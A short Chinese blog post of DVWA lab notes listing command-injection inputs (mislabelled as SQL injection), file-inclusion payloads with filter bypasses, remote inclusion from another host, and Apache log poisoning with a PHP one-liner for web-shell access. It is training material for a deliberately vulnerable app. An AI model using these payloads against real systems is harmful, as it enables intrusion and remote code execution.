首页 > 其他 > 详细

DVWA

时间:2019-08-16 18:24:34      阅读:78      评论:0      收藏:0      [点我收藏+]

SQL注入

low  127.0.0.1 | whoami

medium  127.0.0.1| whoami  由于源码中会过滤‘ |’,所以将空格去掉即可

 

 

 

文件包含

low

本地payload  http://127.0.0.1/DVWA/vulnerabilities/fi/?page=../../../123.txt

         查看网页元素,找到cookies,在蚁剑中进行配置

远程payload  http://192.168.1.168/dvwa/vulnerabilities/fi/?page=http://192.168.1.168/123.txt

medium

因为源码中会将../删除,所以将路径中的../改为....//即可

high

http://192.168.1.168/dvwa/vulnerabilities/fi/?page=file://C:\phpStudy\PHPTutorial\WWW\123.txt

因为源码中要求文件头为file,file:\\是用来寻找文件的命令

burp抓包传入一句话<?php phpinfo();?>

这样日志里记录的一句话就不会被url编码

http://192.168.1.120/dvwa/vulnerabilities/fi/?page=file:\\..\..\..\..\..\Apache\logs\access.log

DVWA

原文:https://www.cnblogs.com/hqhdry/p/11365516.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!